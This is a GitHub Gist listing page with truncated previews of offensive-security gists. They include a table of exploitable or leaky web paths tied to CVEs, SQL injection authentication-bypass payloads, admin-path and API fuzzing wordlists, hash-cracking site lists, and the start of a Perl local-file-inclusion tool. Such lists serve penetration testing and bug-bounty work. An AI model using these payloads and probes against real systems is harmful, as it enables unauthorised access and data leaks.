Skip to content

Instantly share code, notes, and snippets.

View hxlxmj's full-sized avatar

Halim J. hxlxmj

49 followers · 174 following
View GitHub Profile
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active October 8, 2025 15:50
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@spenkk
spenkk / sqli-auth-bypass.txt
Created November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@vijay922
vijay922 / ExploitDB.txt
Last active December 3, 2025 21:17
frs/admin/qrs.php
__admin
__cache/
__index.php
__MACOSX
__pma___
__SQL
__test.php
_.htpasswd
_adm
@richlamdev
richlamdev / hash lookups
Last active March 2, 2026 12:21
Hash lookups online
LIST OF WEBSITES DEHASH / HASH ONLINE
https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active April 20, 2026 01:12
Subdomain Wordlist
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active May 22, 2026 21:37
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@giovanni-d
giovanni-d / allinonemigration.md
Last active May 8, 2026 17:53
All-in-One WP Migration - Restore From Server (without PRO version) - Restore

All-in-One WP Migration Restore From Server (without pro version)

If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, open your browser’s dev tools and run the code below in the console:

Last confirmed working: May 2025 on version 7.94

var filename = 'FILENAME.wpress';
@vijay922
vijay922 / LFI.pl
Created May 22, 2019 05:11 — forked from Kaizen1337/LFI.pl
LocalFile
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
system("title The JavaHaxor Group");
system("color 1e");
system ("cls");
print " |=======================================================|\n";
print " |= _ ______ _____ =|\n";
print " |= | | | ____|_ _| =|\n";
@wavezhang
wavezhang / java_download.sh
Last active May 20, 2026 20:33
download java from oracle without login
wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz